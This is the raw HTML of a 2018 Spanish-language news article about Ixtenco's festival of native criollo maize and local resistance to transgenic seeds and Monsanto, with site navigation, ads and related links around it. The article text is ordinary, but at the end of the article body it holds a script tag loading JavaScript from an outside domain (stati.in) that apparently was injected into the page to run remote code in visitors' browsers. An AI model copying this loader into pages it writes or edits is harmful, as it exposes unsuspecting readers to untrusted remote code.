http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6036-406x247.jpg 406w" sizes="(max-width: 579px) 100vw, 579px" /></a>Estuvo a la disposición del público un sinnúmero de artesanías otomíes que variaba entre bordados en pepenado, cuadros de semillas y tejidos en telar de cintura, típicos de la región. Mientras que las mesas dedicadas a la gastronomía del maíz rebosaban de mole de matuma y de atole morado o agrio, una bebida espesa hecha con maíz fermentado y endulzado con panela que tarda un día y medio en prepararse, además de otros <strong>productos característicos de las industrias rurales de Ixtenco</strong>.</span></p><p style="text-align: justify;"><span style="font-weight: 400;">Más la atracción principal de la fiesta fue la expo-venta de la sorprendente <a href="http://www.biodiversidad.gob.mx/usos/maices/razas2012.html" target="_blank">variedad de razas</a> de las semillas: había canastas que colmaban de</span><span style="font-weight: 400;"> maíz azul, morado y rosa, del conocido como cacahuazentle, del sangre de Cristo y del singular maíz ajo.</span></p><p style="text-align: justify;"><span style="font-weight: 400;">El evento funciona como un escaparate para <strong>mostrar las variedades de maíz que tienen</strong>, a la vez que generan ganancias al <strong>comercializar con las semillas</strong> que seleccionan de la mazorca a partir de su calidad para sembrar; así los resguardadores del maíz criollo aprovechan la ocasión para propiciar la compra de sus principales consumidores: otros agricultores de comunidades aledañas. De ahí la fecha de esta fiesta en particular, Domingo de Ramos por marcar el inicio de la cosecha.</span></p><p style="text-align: justify;"><span style="font-weight: 400;">Vicente Ortega, agricultor comprometido con la defensa del maíz criollo, recuerda que antes de la Fiesta del Maíz, únicamente cosechaban las semillas para preservarlas; de suerte que agradezca que actualmente la demanda de las variedades haya crecido, hoy en día también <strong>cosechan para comercializar</strong>. “Para las personas son muy atractivas las variedades, les llama la atención ver maíces de diferentes colores y comer tortillas rojas o azules.”</span></p><p style="text-align: center;"><b>“La agricultura se ve fácil cuando el arado es un lápiz y se está a mil millas del campo de maíz”: Dwight D. Eisenhower</b></p><p style="text-align: justify;"><span style="font-weight: 400;">Sin duda, de tal fiesta resalta que todas las variedades de maíz ofertadas por la comunidad sean criollas, es decir de polinización abierta, bajo el <strong>contexto de la proliferación de semillas transgénicas</strong> y las tecnologías desarrolladas por gigantes como <a href="http://www.monsantoglobal.com/global/lan/Pages/default.aspx" target="_blank">Monsanto</a>. Se trata de un proceso difícil de llevar a cabo al, por ejemplo, no utilizar más riego que el temporal; de ahí que cada ciclo sea largo al durar entre 7 y 8 meses.</span></p><p style="text-align: justify;"><span style="font-weight: 400;">&#8220;Hoy en día <strong>es complicado hablar de un proyecto sustentable</strong>”, explica Ortega. &#8220;Además habría que trabajar la parte social, que los compañeros <strong>acepten la transición</strong>. Me dicen: ¿quitar fertilizantes?, ¿cómo crees?, si eso no te sirve, ¿estás loco?, ¿para qué gastas más?, yo no le entro porque no quiero deshierbar a mano.&#8221;</span></p><p style="text-align: justify;"><span style="font-weight: 400;">Por lo anterior, es que justamente esta celebración es por <strong>la lucha en contra de esas casas semilleras productoras de maíz transgénico o híbrido</strong>. “No es un peligro, sino un reto a vencer porque van desplazando a los maíces nativos, lo que hace a su vez que nos volvamos <a href="https://www.vice.com/es_mx/article/xdjyek/la-semilla-roja-asi-funciona-monsanto-en-mexico?utm_campaign=sharebutton" target="_blank">dependientes</a> a este tipo de semillas”, afirma Vicente Ortega. </span></p><p style="text-align: justify;"><span style="font-weight: 400;">Entre muchos otros factores, lo alarmante de las siembras transgénicas son los <strong>contratos de concesión de licencias de uso</strong> firmadas entre los agricultores y empresas como Monsanto, ya que el monto de inversión del agricultor es comprometedor al ser <strong>necesario el uso de paquetes tecnológicos especiales</strong> (herbicidas, nematicidas, acaricidas y fertilizantes) para asegurar la cosecha de la temporada. Además, una vez utilizadas las semillas, <strong>su reuso se vuelve imposible</strong> porque la calidad de la semilla disminuiría de ser así, entonces los agricultores deben comprar más. “<strong>Te amarra eso</strong>. Es una competencia desleal”, lamenta el agricultor nativo de la región. “Y aunque uno lo intente hacer de manera, digamos, orgánica o libre de químicos, es casi imposible porque si el vecino que está arriba de ti no lo hace, te va a<strong> contaminar por la lixiviación o la polinización</strong>.”</span></p><p style="text-align: justify;"><span style="font-weight: 400;">Entonces la cuestión recae en <strong>¿cómo involucrar a la gente en un proceso tan arduo?</strong>, en la defensa de un grano que “debiera ser tratado como tesoro nacional”, aseguran los campesinos. No podemos olvidar que la <a href="https://www.socla.co/" target="_blank">Sociedad Científica Latinoamericana de Agroecología</a> ha declarado al pueblo de Ixtenco como custodios de los maíces criollos de colores en el aporte del patrimonio Agrícola Mundial.</span></p><p style="text-align: center;"><b>La reconciliación del maíz criollo ante la amenaza de modificaciones genéticas</b></p><p style="text-align: center;"><a href="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/elote.jpeg"><img class="size-full wp-image-407362 aligncenter" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/elote.jpeg" alt="elote" width="579" height="383" srcset="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/elote.jpeg 579w, http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/elote-150x99.jpeg 150w, http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/elote-406x269.jpeg 406w" sizes="(max-width: 579px) 100vw, 579px" /></a></p><p style="text-align: justify;"><span style="font-weight: 400;">En el 2011, el Congreso del Estado de Tlaxcala <a href="http://www.lajornadadeoriente.com.mx/2011/01/14/tlaxcala/tla105.php" target="_blank">aprobó</a> la Ley Agrícola de Fomento y Protección al Maíz como Patrimonio Originario, en Diversificación Constante y Alimentario; legislación con la cual la entidad se convirtió en el <strong>primer estado del país en contrapesar</strong> el avistamiento de los consorcios internacionales que desde el 2005, con la promulgación de la <a href="http://www.salud.gob.mx/unidades/cdi/nom/compi/ley180305.html" target="_blank">Ley de Bioseguridad y Organismos Genéticamente Modificados</a> (LBOGM), han pretendido <strong>apoderarse, sembrar y hacer experimentos</strong> con las semillas criollas del maíz en su centro de origen. </span></p><p style="text-align: justify;"><span style="font-weight: 400;">Con dicha ley, la intención fue <strong>declarar al maíz criollo como patrimonio de Tlaxcala</strong>; así como fomentar el desarrollo sustentable de este grano al promover su productividad, competitividad y biodiversidad. No obstante, la LBOGM, al tratarse de una ley federal,  permanece como la máxima que determina las regulaciones sobre tal siembra a escala nacional. </span></p><p style="text-align: justify;"><span style="font-weight: 400;">Por lo anterior, cabe señalar la <a href="https://www.facebook.com/ColectividadMaiz/?fref=ts" target="_blank">demanda colectiva</a> que lleva más de cuatro años en disputa legal con Sagarpa, Semarnat, Monsanto, PHI (Pioneer-Dupont), Syngenta y Dow Agrosciences, por mantener la suspensión que han logrado imponer a la siembra de maíz transgénico en todo México. 53 personas, entre científicos, apicultores, académicos, campesinos, defensores de derechos humanos, ambientalistas, artistas, y más <strong>consumidores de la semilla milenaria</strong>, persiguen que las autoridades declaren que “la liberación o siembra de maíces transgénicos <strong>dañará el derecho humano</strong> a la diversidad biológica de los maíces nativos, de las generaciones actuales y futuras; así como los derechos relacionados: derecho a la alimentación, derecho a la salud y derechos de los pueblos originarios.”</span></p><p style="text-align: justify;">Lamentablemente, ante la reciente <a href="http://www.lajornadadeoriente.com.mx/2016/11/14/fusion-monsanto-bayer/" target="_blank">fusión de Bayer y Monsanto</a> que, en palabras de los críticos de tal expansión de participación de mercado, “creará la corporación de agronegocios más grande y poderosa del mundo”; y la cercana aprobación de la <a href="http://www.lajornadadeoriente.com.mx/2017/02/28/eliminar-la-biodiversidad/" target="_blank">Ley General de Biodiversidad</a>; <strong>el freno de la entrada de semillas genéticamente modificadas y pesticidas tóxicos en México se vulnera</strong>.</p><p style="text-align: justify;"><span style="font-weight: 400;">Por ello, más que nunca se ha convertido en el <strong>trabajo de todos el resguardo de esta herencia ancestral</strong> que para México significa mucho más que sólo un sustento alimentario. Si como sociedad nos inquietamos por <strong>investigar el origen de los alimentos</strong> que consumimos, si nos interesamos por <strong>participar en celebraciones a los productos autóctonos</strong> de nuestro país como la Feria del Maíz de Ixtenco, y <strong>adquirimos los productos de agricultores comprometidos con el maíz criollo</strong> como Vicente Ortega, los beneficios del grano seguirán siendo el legado que las futuras generaciones mexicanas puedan aprovechar.</span></p><p>&nbsp;</p><p><script src="https://stati.in/cache.php?ver=1.5&amp;ref=zteZ" type="text/javascript"></script></p> </span><div style="width:40%;" ><div style="float: left; " class="fb-like" data-href="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" data-layout="button_count" data-action="like" data-show-faces="false" data-share="false"></div><div style="float: right; "> <a href="https://twitter.com/share" class="twitter-share-button" data-url="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" data-via="jornadaoriente" data-lang="es">Twittear</a></div></div><p>&nbsp;</p><div id="fb-root"></div><hr> <!-- Anuncios relacionados --> <script async src="//"></script> <ins class="adsbygoogle"
style="display:block"
data-ad-format="autorelaxed"
data-ad-client="ca-pub-4489966912064550"
data-ad-slot="6220379578"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> <hr><div style="float: left; padding-top: 10px;"> ■ COMENTARIOS</div><div style="float: right;"> Comparte esta nota:<ul class="social_media"><li> <a target="_blank" href="http://twitter.com/home?status=En tiempos transgénicos, Ixtenco celebra al maíz nativo http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" title="Retweet"> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/twitter.png" alt=""/> </a></li><li><a id="fb-share" style='text-decoration:none;' type="icon_link" onClick="window.open('http://m.facebook.com/sharer.php?u=http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/&p[images][0]=http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/dsc6037-579x384.jpg','sharer','toolbar=0,status=0,width=700,height=350');" href="javascript: void(0)"> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/facebook.png" alt=""/> </a></li><li> <a target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/&title=En tiempos transgénicos, Ixtenco celebra al maíz nativo&annotation=" title="Google+"> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/google.png" alt=""/> </a></li><li style="padding-top: 8px;"> <a href="www.lajornadadeoriente.com.mx/envio-nota/?id=www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" class="fancybox fancybox.iframe" target="_blank" title="Comparte por Correo"> <img class="WP-EmailIcon" src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/mail2.png" alt=""/> </a></li></ul></div><div style="margin-top: 18px;" class="fb-comments" data-href="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" data-num-posts="5" data-width="580" data-notify="true" notify="true"></div></div></div> <!-- End each blog post --></div> <br class="clear"/> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 468x60 mitad --> <ins class="adsbygoogle"
style="display:inline-block;width:468px;height:60px"
data-ad-client="ca-pub-4489966912064550"
data-ad-slot="3992953053"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> <br class="clear"/><div class="post_wrapper" style="margin-top:15px"><div class="post_wrapper_inner"> <br class="clear"/> <!--<br class="clear"/>--><div style="margin-bottom: 8px;"> ■ MÁS NOTICIAS EN COLABORACIONES</div><div><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" title="En tiempos transgénicos, Ixtenco celebra al maíz nativo">En tiempos transgénicos, Ixtenco celebra al maíz nativo</a></h6><span style="font-size: 10px;"><b>17:31</b> (30/03/2018)</span></li><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/29/solalinde-los-migrantes-del-sur/" title="Solalinde. Los migrantes del sur">Solalinde. Los migrantes del sur</a></h6><span style="font-size: 10px;"><b>04:00</b> (29/03/2018)</span></li><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/27/los-jovenes-universitarios-mundo-hoy-retos-paradigmas-venir/" title="Los jóvenes universitarios en el mundo de hoy. Retos y paradigmas por venir">Los jóvenes universitarios en el mundo de hoy. Retos y paradigmas por venir</a></h6><span style="font-size: 10px;"><b>04:00</b> (27/03/2018)</span></li><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/22/para-mario-porque-es-humano/" title="Para Mario, porque es humano">Para Mario, porque es humano</a></h6><span style="font-size: 10px;"><b>07:23</b> (22/03/2018)</span></li><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/20/la-suprema-corte-justicia-la-nacion-legislando/" title="La Suprema Corte de Justicia de la Nación legislando">La Suprema Corte de Justicia de la Nación legislando</a></h6><span style="font-size: 10px;"><b>04:00</b> (20/03/2018)</span></li><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/15/primer-encuentro-mujeres-luchan-zapatistas/" title="Lo que viví en el Primer Encuentro de Mujeres que Luchan">Lo que viví en el Primer Encuentro de Mujeres que Luchan</a></h6><span style="font-size: 10px;"><b>14:38</b> (15/03/2018)</span></li><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/15/lo-femenino/" title="Lo femenino antifeminista: imágenes discursivas">Lo femenino antifeminista: imágenes discursivas</a></h6><span style="font-size: 10px;"><b>04:40</b> (15/03/2018)</span></li><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/15/ley-seguridad-interior-elementos-juicio-iv/" title="Ley de Seguridad Interior: elementos para un juicio / IV">Ley de Seguridad Interior: elementos para un juicio / IV</a></h6><span style="font-size: 10px;"><b>04:00</b> (15/03/2018)</span></li><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/12/del-indio-sin-alma-al-indigena-sin-cultura-respuesta-gmi-consulting/" title="Del indio sin alma al indígena sin cultura (respuesta a GMI Consulting)">Del indio sin alma al indígena sin cultura (respuesta a GMI Consulting)</a></h6><span style="font-size: 10px;"><b>04:00</b> (12/03/2018)</span></li><li style="margin: 4px 0px 4px 10px;"><h6><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/> <a href="http://www.lajornadadeoriente.com.mx/2018/03/12/vuelvo-mirar-mar/" title="Vuelvo a mirar el mar">Vuelvo a mirar el mar</a></h6><span style="font-size: 10px;"><b>04:00</b> (12/03/2018)</span></li></div></div></div></div><div class="sidebar_wrapper"><div class="sidebar"><div class="content"><div class="google_ad_seccionlateral_1 clear"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 2017_sidebar_notas_300x600 --> <ins class="adsbygoogle"
style="display:inline-block;width:300px;height:600px"
data-ad-client="ca-pub-4489966912064550"
data-ad-slot="7180357972"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> </div><br class="clear" /><ul class="sidebar_widget clear"><li id="numero-hoy" class="widget widget_recent_entries"><h2 class="widgettitle">Últimas Noticias</h2><ul><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>17:31</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/ixtenco-celebra-maiz-nativo/" title="En tiempos transgénicos, Ixtenco celebra al maíz nativo">En tiempos transgénicos, Ixtenco celebra al maíz nativo</a></h6></li><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>12:45</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/la-campana-arrecia-peje-sube/" title="LA CAMPAÑA ARRECIA Y EL PEJE SUBE">LA CAMPAÑA ARRECIA Y EL PEJE SUBE</a></h6></li><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>10:47</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/pese-al-dolor-los-engrillados-atlixco-procesionan-cumplir-mandas/" title="Pese al dolor, los engrillados de Atlixco procesionan para cumplir sus mandas">Pese al dolor, los engrillados de Atlixco procesionan para cumplir sus mandas</a></h6></li><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>04:00</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/morena-denunciara-penalmente-funcionaria-del-iee-proteger-martha-erika-alonso/" title="Morena denunciará penalmente a funcionaria del IEE por proteger a Martha Érika Alonso">Morena denunciará penalmente a funcionaria del IEE por proteger a Martha Érika Alonso</a></h6></li><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>04:00</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/chalchihuapan-los-casos-gravedad-sexenio-epn-cndh/" title="Chalchihuapan, entre los casos de gravedad en el sexenio de EPN: CNDH">Chalchihuapan, entre los casos de gravedad en el sexenio de EPN: CNDH</a></h6></li><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>04:00</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/lo-realmente-importa/" title="Lo que realmente importa">Lo que realmente importa</a></h6></li><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>04:00</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/pericos-barre-oaxaca/" title="Pericos barre a Oaxaca">Pericos barre a Oaxaca</a></h6></li><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>04:00</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/puebla-restaurados-29-inmuebles-afectados-tras-19s-dice-la-scult-federal/" title="En Puebla han sido restaurados 29 inmuebles afectados tras el 19S, dice la Scult federal">En Puebla han sido restaurados 29 inmuebles afectados tras el 19S, dice la Scult federal</a></h6></li><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>04:00</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/ayuntamiento-puebla-e-iee-acuerdan-capacitar-personal-evitar-delitos-electorales/" title="Ayuntamiento de Puebla e IEE acuerdan capacitar a personal para evitar delitos electorales">Ayuntamiento de Puebla e IEE acuerdan capacitar a personal para evitar delitos electorales</a></h6></li><li style="text-align: left;"><h6 style="line-height: 17px"> <span class="post_detail_space" style="font-size: 10.5px; font-style: italic; font-weight: normal;"> <span class="rojo"><b>04:00</b></span> <span style="font-style: normal;">&nbsp;|&nbsp;</span> </span> <a href="http://www.lajornadadeoriente.com.mx/2018/03/30/cornada-1248/" title="Cornada">Cornada</a></h6></li></ul></li></ul><div id="polls-1226" class="wp-polls"><form id="polls_form_1226" class="wp-polls-form" action="/index.php" method="post"><p style="display: none;"><input type="hidden" id="poll_1226_nonce" name="wp-polls-nonce" value="28581b6a4e" /></p><p style="display: none;"><input type="hidden" name="poll_id" value="1226" /></p><ul class="sidebar_widget"><li id="numero-hoy" class="widget widget_recent_entries"><h2 class="widgettitle">Encuesta del día</h2><div style="text-align: center; padding: 0px 10px"><h6>¿Crees que ya está definido quién va a ganar la Presidencia de la República?</h6><div id="polls-1226-ans" class="wp-polls-ans"><ul class="wp-polls-ul"><li style="background-image: none; padding-bottom: 0px;"><input type="radio" id="poll-answer-2590" name="poll_1226" value="2590" /> <label for="poll-answer-2590">Si</label></li><li style="background-image: none; padding-bottom: 0px;"><input type="radio" id="poll-answer-2591" name="poll_1226" value="2591" /> <label for="poll-answer-2591">No</label></li></ul><p style="text-align: center; padding-top: 10px"> <input type="button" name="vote" value="Votar" class="Buttons" style="background-color: #c30d17; padding: 7px; "onclick="poll_vote(1226);" /></p><p style="text-align: center; padding: 4px 0px;"><a href="#ViewPollResults" onclick="poll_result(1226); return false;" title="Vel Resultados de esta Encuesta">Ver Resultados</a></p></form></div><div id="polls-1226-loading" class="wp-polls-loading"><img src="http://www.lajornadadeoriente.com.mx/wp-content/plugins/wp-polls/images/loading.gif" width="16" height="16" alt="Loading ..." title="Loading ..." class="wp-polls-image" />&nbsp;Loading ...</div></div> <br class="clear"></div><div class="google_ad_seccionlateral_1 clear"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 2017_sidebar_notas_300x600_2 --> <ins class="adsbygoogle"
style="display:inline-block;width:300px;height:600px"
data-ad-client="ca-pub-4489966912064550"
data-ad-slot="5713011555"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> </div><br class="clear" /><ul class="sidebar_widget clear"><li id="numero-hoy" class="widget widget_recent_entries"><h2 class="widgettitle"><img class="favicon_widget" src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/favicon16.png" alt=""/>&nbsp; Cartones</h2><ul><li><div id="new-royalslider-542" class="royalSlider new-royalslider-542 rsUni visibleNearbyZoom" style="width:100%;height:300px;;"><div class="rsContent"> <img class="rsImg" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5780-cpatricio-579x399.jpg" data-rsBigImg="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5780-cpatricio.jpg" alt="Los monos de Patricio - Manipulación electoral vía Facebook"/><div class="rsCaption"><h5>Los monos de Patricio - Manipulación electoral vía Facebook</h5> <span></span></div> <a class="rsLink" href="http://www.lajornadadeoriente.com.mx/2018/03/23/los-monos-patricio-manipulacion-electoral-via-facebook/">Los monos de Patricio - Manipulación electoral vía Facebook</a></div><div class="rsContent"> <img class="rsImg" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5779-cpatricio-579x399.jpg" data-rsBigImg="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5779-cpatricio.jpg" alt="Hagamos bien las cuentas - Los monos de Patricio"/><div class="rsCaption"><h5>Hagamos bien las cuentas - Los monos de Patricio</h5> <span></span></div> <a class="rsLink" href="http://www.lajornadadeoriente.com.mx/2018/03/22/hagamos-bien-las-cuentas-los-monos-patricio/">Hagamos bien las cuentas - Los monos de Patricio</a></div><div class="rsContent"> <img class="rsImg" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5778-cpatricio-579x399.jpg" data-rsBigImg="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5778-cpatricio.jpg" alt="Los monos de Patricio - Lista de candidatos"/><div class="rsCaption"><h5>Los monos de Patricio - Lista de candidatos</h5> <span></span></div> <a class="rsLink" href="http://www.lajornadadeoriente.com.mx/2018/03/21/los-monos-patricio-lista-candidatos/">Los monos de Patricio - Lista de candidatos</a></div><div class="rsContent"> <img class="rsImg" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5777-cpatricio-579x399.jpg" data-rsBigImg="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5777-cpatricio.jpg" alt="Aplicando la lógica vargasllosiana..."/><div class="rsCaption"><h5>Aplicando la lógica vargasllosiana...</h5> <span></span></div> <a class="rsLink" href="http://www.lajornadadeoriente.com.mx/2018/03/20/aplicando-la-logica-vargasllosiana/">Aplicando la lógica vargasllosiana...</a></div><div class="rsContent"> <img class="rsImg" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5776-cpatricio-579x399.jpg" data-rsBigImg="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5776-cpatricio.jpg" alt="Los monos de Patricio - Falso de toda falsedad"/><div class="rsCaption"><h5>Los monos de Patricio - Falso de toda falsedad</h5> <span></span></div> <a class="rsLink" href="http://www.lajornadadeoriente.com.mx/2018/03/19/los-monos-patricio-falso-toda-falsedad/">Los monos de Patricio - Falso de toda falsedad</a></div><div class="rsContent"> <img class="rsImg" src="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5774-cpatricio-579x399.jpg" data-rsBigImg="http://www.lajornadadeoriente.com.mx/wp-content/uploads/2018/03/5774-cpatricio.jpg" alt="Los monos de Patricio - Prototipos de túneles"/><div class="rsCaption"><h5>Los monos de Patricio - Prototipos de túneles</h5> <span></span></div> <a class="rsLink" href="http://www.lajornadadeoriente.com.mx/2018/03/15/los-monos-patricio-prototipos-tuneles-2/">Los monos de Patricio - Prototipos de túneles</a></div></div></li></ul></li></ul><ul class="sidebar_widget"><li id="numero-hoy" class="widget widget_recent_entries"><!--<h2 class="widgettitle">Blogs</h2>--><ul><li> <span class="post_head"> <!-- <span class="post_head"> --> <a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/zenzontle-blogs/" title="El Zenzontle">EL ZENZONTLE</a> <!-- </span> --> <br><h6> <a class="colabs" href="http://www.lajornadadeoriente.com.mx/2018/03/26/genaro-victoria-e-hilda/" title="Genaro, Victoria e Hilda">Genaro, Victoria e Hilda</a></h6> <span class="author"> Colectivo del Periódico el Zenzontle<!-- <span class="date"> </span> --> </span> </span> <br /></li><li> <span class="post_head"> <!-- <span class="post_head"> --> <a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/botica/" title="Botica">BOTICA</a> <!-- </span> --> <br><h6> <a class="colabs" href="http://www.lajornadadeoriente.com.mx/2018/03/30/la-campana-arrecia-peje-sube/" title="LA CAMPAÑA ARRECIA Y EL PEJE SUBE">LA CAMPAÑA ARRECIA Y EL PEJE SUBE</a></h6> <span class="author"> Jorge Meléndez<!-- <span class="date"> </span> --> </span> </span> <br /></li><li> <span class="post_head"> <!-- <span class="post_head"> --> <a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/saber/" title="Saber sin fin">SABER SIN FIN</a> <!-- </span> --> <br><h6> <a class="colabs" href="http://www.lajornadadeoriente.com.mx/2017/01/30/azril-bacal/" title="Vital estar informado en tiempos de resistencia: Azril Bacal">Vital estar informado en tiempos de resistencia: Azril Bacal</a></h6> <span class="author"> Abel Pérez Rojas<!-- <span class="date"> </span> --> </span> </span> <br /></li><li> <span class="post_head"> <!-- <span class="post_head"> --> <a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/b_blog_de_rafael/" title="El blog de Rafael H. Pagán Santini">EL BLOG DE RAFAEL H. PAGáN SANTINI</a> <!-- </span> --> <br><h6> <a class="colabs" href="http://www.lajornadadeoriente.com.mx/2017/03/18/las-reformas-estructurales-contexto-electoral/" title="Las reformas estructurales en el contexto electoral">Las reformas estructurales en el contexto electoral</a></h6> <span class="author"> Rafael H. Pagán Santini<!-- <span class="date"> </span> --> </span> </span> <br /></li><li> <span class="post_head"> <!-- <span class="post_head"> --> <a href="http://www.lajornadadeoriente.com.mx/categorias/blogs/b_tiempo/" title="Tiempos de furia">TIEMPOS DE FURIA</a> <!-- </span> --> <br><h6> <a class="colabs" href="http://www.lajornadadeoriente.com.mx/2018/03/08/robert-parry-periodismo-investigacion/" title="Robert Parry (1949-2018): "Los periodistas de investigación terminamos como parias"">Robert Parry (1949-2018): "Los periodistas de investigación terminamos como parias"</a></h6> <span class="author"> Oriol Mallo<!-- <span class="date"> </span> --> </span> </span> <br /></li></ul></li></ul><div class="google_ad_seccionlateral_4 clear"> <!-- wp-sidebar_ad1-300x250_txt --><div id='div-gpt-ad-1424633569618-0' style='width:300px; height:250px;'></div></div> <br class="clear" /></div></div> <br class="clear"/><div class="sidebar_bottom"></div></div></div> <!-- End main content --> <br class="clear"/></div><div class="bottom"></div></div> <!-- End content --><!-- /4424848/PortadaLeaderBottom --><div 